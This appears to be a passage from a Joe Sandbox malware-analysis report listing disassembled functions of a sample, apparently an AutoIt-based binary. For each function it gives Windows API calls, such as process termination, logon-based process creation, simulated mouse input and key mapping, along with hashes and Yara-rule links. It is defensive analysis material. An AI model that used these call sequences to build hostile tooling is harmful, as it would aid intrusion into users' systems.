                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 642888154-0
                                                                        • Opcode ID: 4758ce72135f265bca0a4a001534f168d4a80294404fd9753dcc9f688446c65c
                                                                        • Instruction ID: c24601a6281fe0f0e0c565983ed933aaf19ddb352d725559470128a9642eddd6
                                                                        • Opcode Fuzzy Hash: 4758ce72135f265bca0a4a001534f168d4a80294404fd9753dcc9f688446c65c
                                                                        • Instruction Fuzzy Hash: C3417230601140EFDB21DF24C49DBA47BE1FF45308F1891AAEA68AF3A2C731A846CB51
                                                                        Function 00EB98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EB98D1
                                                                          • Part of subcall function 00E8F4EA: std::exception::exception.LIBCMT ref: 00E8F51E
                                                                          • Part of subcall function 00E8F4EA: __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EB9908
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00EB9924
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00EB999E
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EB99B3
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EB99D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 2537439066-0
                                                                        • Opcode ID: 5db8b2a2123edf2a428e0e2fd3368ab2e13b36422a0d42984e5ea10e5c072fae
                                                                        • Instruction ID: df31b3a85c271648fb07b6c7bc9fd6dc2be648254c08f5b055ce2d23802b7455
                                                                        • Opcode Fuzzy Hash: 5db8b2a2123edf2a428e0e2fd3368ab2e13b36422a0d42984e5ea10e5c072fae
                                                                        • Instruction Fuzzy Hash: CB316F31900105AFDB10AFA5DC85EAFBBB9FF85310B1480A9F908BB256D774DE14DBA0
                                                                        Function 00EC9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00EC77F4,?,?,00000000,00000001), ref: 00EC9B53
                                                                          • Part of subcall function 00EC6544: GetWindowRect.USER32(?,?), ref: 00EC6557
                                                                        • GetDesktopWindow.USER32 ref: 00EC9B7D
                                                                        • GetWindowRect.USER32(00000000), ref: 00EC9B84
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EC9BB6
                                                                          • Part of subcall function 00EB7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EB7AD0
                                                                        • GetCursorPos.USER32(?), ref: 00EC9BE2
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EC9C44
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: 6b5a6265fe8770c8f29a783f96ebf2d15d224e0344395059ce41819c0dcadc0b
                                                                        • Instruction ID: a0ffdfbc6900bd8734a78a32362c7c2be91e3ac7814e294788869ae83ba5fadf
                                                                        • Opcode Fuzzy Hash: 6b5a6265fe8770c8f29a783f96ebf2d15d224e0344395059ce41819c0dcadc0b
                                                                        • Instruction Fuzzy Hash: 2A31BC72108315AFC710DF149C49FABBBEAFF88314F00091AF585E7182DA31EA09CB92
                                                                        Function 00EAAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EAAFAE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00EAAFB5
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EAAFC4
                                                                        • CloseHandle.KERNEL32(00000004), ref: 00EAAFCF
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EAAFFE
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EAB012
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: a95262a53e7b3d67db6dcb6efd151c46edaab729c3048dde82fa13860c75eda5
                                                                        • Instruction ID: 2e36fd59e4f8a30541ce0c528036900a40b49b2e8f51d0508d6bbb0d6e989967
                                                                        • Opcode Fuzzy Hash: a95262a53e7b3d67db6dcb6efd151c46edaab729c3048dde82fa13860c75eda5
                                                                        • Instruction Fuzzy Hash: 97217F72105309AFDB128F94DD09BEE7BAAEF49308F084025FA01BA161C375AD24EB61
                                                                        Function 00EDEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00E8AFE3
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8AFF2
                                                                          • Part of subcall function 00E8AF83: BeginPath.GDI32(?), ref: 00E8B009
                                                                          • Part of subcall function 00E8AF83: SelectObject.GDI32(?,00000000), ref: 00E8B033
                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00EDEC20
                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00EDEC34
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EDEC42
                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00EDEC52
                                                                        • EndPath.GDI32(00000000), ref: 00EDEC62
                                                                        • StrokePath.GDI32(00000000), ref: 00EDEC72
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        • Opcode ID: 25c98aa31b5221e19191b9e2b9345fbde58ed37fd6466602c2a54ef65fbb32cb
                                                                        • Instruction ID: a1fb6e00c37a4913125d888dd2d5dfd3e461893e0e6e86ddcb4e9b28895bc948
                                                                        • Opcode Fuzzy Hash: 25c98aa31b5221e19191b9e2b9345fbde58ed37fd6466602c2a54ef65fbb32cb
                                                                        • Instruction Fuzzy Hash: 6611DE7200414DBFEF129F91DD88EEA7F6EEB08354F048112BE1969260D7719D55DBA0
                                                                        Function 00EAE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00EAE1C0
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EAE1D1
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EAE1D8
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EAE1E0
                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EAE1F7
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00EAE209
                                                                          • Part of subcall function 00EA9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00EA9A05,00000000,00000000,?,00EA9DDB), ref: 00EAA53A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                        • String ID:
                                                                        • API String ID: 603618608-0
                                                                        • Opcode ID: 270db52db542fec028d53cf749a3b4de36dbba9ecc4adf2ed5059b5c8827960b
                                                                        • Instruction ID: b72170752aed7818d8c09eacda6a076097e3e68e1475e6e08ed2fa2366a69acc
                                                                        • Opcode Fuzzy Hash: 270db52db542fec028d53cf749a3b4de36dbba9ecc4adf2ed5059b5c8827960b
                                                                        • Instruction Fuzzy Hash: C20184B5A00214BFEB109FA68C45B5EBFB9EB89751F004066EA04FB390DA709C01CB60
                                                                        Function 00E727EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E7281D
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E72825
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E72830
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E7283B
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E72843
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7284B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: 9366000d194355209d16df031fa14084d553e741cdfdccb8166dea875a288e97
                                                                        • Instruction ID: 4d05c19bc917994537c5819217fcfb6b73462981270c5a80b1017ca9e4e68230
                                                                        • Opcode Fuzzy Hash: 9366000d194355209d16df031fa14084d553e741cdfdccb8166dea875a288e97
                                                                        • Instruction Fuzzy Hash: 17016CB0901B597DE3008F6A8C85B52FFA8FF55354F00411B915C47941C7F5A864CBE5
                                                                        Function 00EB9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 1423608774-0
                                                                        • Opcode ID: 32eff28cd38fd1899689fdbccabf28ec6210fa4cc1f5dee8713c36fc9655e926
                                                                        • Instruction ID: 8945177cbecac4f0d1cb2da7aa4c096eec99f63f23f53f10f431689028a154f6
                                                                        • Opcode Fuzzy Hash: 32eff28cd38fd1899689fdbccabf28ec6210fa4cc1f5dee8713c36fc9655e926
                                                                        • Instruction Fuzzy Hash: 0201A432106211AFE7151B69EC48EFF7BAAFFC9701B14142AF607B20A1EB749804DB90
                                                                        Function 00EB7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EB7C07
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EB7C1D
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00EB7C2C
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EB7C3B
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EB7C45
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EB7C4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: 23a30ba4de30c71daa397716bb9ef37317a7172dde1cb827f6bd5f6f8188355e
                                                                        • Instruction ID: 74454c4ec9764a557b09d2606c3851f7ae48abc29bfeba2b3cd39b90c39cfa90
                                                                        • Opcode Fuzzy Hash: 23a30ba4de30c71daa397716bb9ef37317a7172dde1cb827f6bd5f6f8188355e
                                                                        • Instruction Fuzzy Hash: 9CF0F472246158BFE7215B539C0EEEF7F6DEBCAB15B000018BA01E10519AA05A49C6B5
                                                                        Function 00EB9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00EB9A33
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A44
                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A51
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A5E
                                                                          • Part of subcall function 00EB93D1: CloseHandle.KERNEL32(?,?,00EB9A6B,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB93DB
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EB9A71
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00EE5DEE,?,?,?,?,?,00E7ED63), ref: 00EB9A78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: 4af038f8536a714c4d901527cbf9d839fccd83e1f7a222ef9ebf4d21de2e5713
                                                                        • Instruction ID: 29a2f739c2f1bf9f997c1618659ae15e5239df722b1db14989f66ce30c522637
                                                                        • Opcode Fuzzy Hash: 4af038f8536a714c4d901527cbf9d839fccd83e1f7a222ef9ebf4d21de2e5713
                                                                        • Instruction Fuzzy Hash: 82F05E32149211AFE7121BA9EC89EFF7B6AFFC5301B141425F603B10B1EB759805EB90
                                                                        Function 00E71CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8F4EA: std::exception::exception.LIBCMT ref: 00E8F51E
                                                                          • Part of subcall function 00E8F4EA: __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                        • __swprintf.LIBCMT ref: 00E71EA6
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E71D49
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 2125237772-557222456
                                                                        • Opcode ID: 06e0a7ef88351122f3f7a60d2d394a00a51b1a2030ac04c973b0f62c86017ed6
                                                                        • Instruction ID: 1fd194724d9ba81fe88eb59ecfa50e7d9a8a8e23c70340afa7bcc4308331d6c5
                                                                        • Opcode Fuzzy Hash: 06e0a7ef88351122f3f7a60d2d394a00a51b1a2030ac04c973b0f62c86017ed6
                                                                        • Instruction Fuzzy Hash: EC919C71104341AFC724EF28C895C6AB7E4EF85704F10A96DF999B72A1DB70EE05CB92
                                                                        Function 00ECAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECB006
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00ECB115
                                                                        • VariantClear.OLEAUT32(?), ref: 00ECB298
                                                                          • Part of subcall function 00EB9DC5: VariantInit.OLEAUT32(00000000), ref: 00EB9E05
                                                                          • Part of subcall function 00EB9DC5: VariantCopy.OLEAUT32(?,?), ref: 00EB9E0E
                                                                          • Part of subcall function 00EB9DC5: VariantClear.OLEAUT32(?), ref: 00EB9E1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        • Opcode ID: 95262ab8b070b6ab14dd6b20c4aab5495fc0feb64d4bf37f9aeec700a117acb9
                                                                        • Instruction ID: b4b382bf37cc49b26648d88251647f9ed22dfa40bab7a157f69816c4473bee10
                                                                        • Opcode Fuzzy Hash: 95262ab8b070b6ab14dd6b20c4aab5495fc0feb64d4bf37f9aeec700a117acb9
                                                                        • Instruction Fuzzy Hash: 47916E706083019FC714DF24C582E9AB7E4EF89704F14986DF899AB362D731E906CB52
                                                                        Function 00EB5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                        • _memset.LIBCMT ref: 00EB5438
                                                                        • GetMenuItemInfoW.USER32(?), ref: 00EB5467
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EB5513
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EB553D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        • Opcode ID: 03ac70683344d05232d694a2ade95b753600a543e9ec412c0840a6e83a967224
                                                                        • Instruction ID: e6a20095e9dc3c63daf1fd51b892a97c880b704d3bbfff23955101ca0f9c2e2d
                                                                        • Opcode Fuzzy Hash: 03ac70683344d05232d694a2ade95b753600a543e9ec412c0840a6e83a967224
                                                                        • Instruction Fuzzy Hash: 355103731057019BD7259B28C8417FBB7E9AF85329F18252AF8AAF31D1D760CD44CB52
                                                                        Function 00EB0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EB027B
                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EB02B1
                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EB02C2
                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EB0344
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 753597075-1075368562
                                                                        • Opcode ID: d569c276bd22f9ce2b9f49742c48f5eb7d10cb5a337c49365311a259200c8951
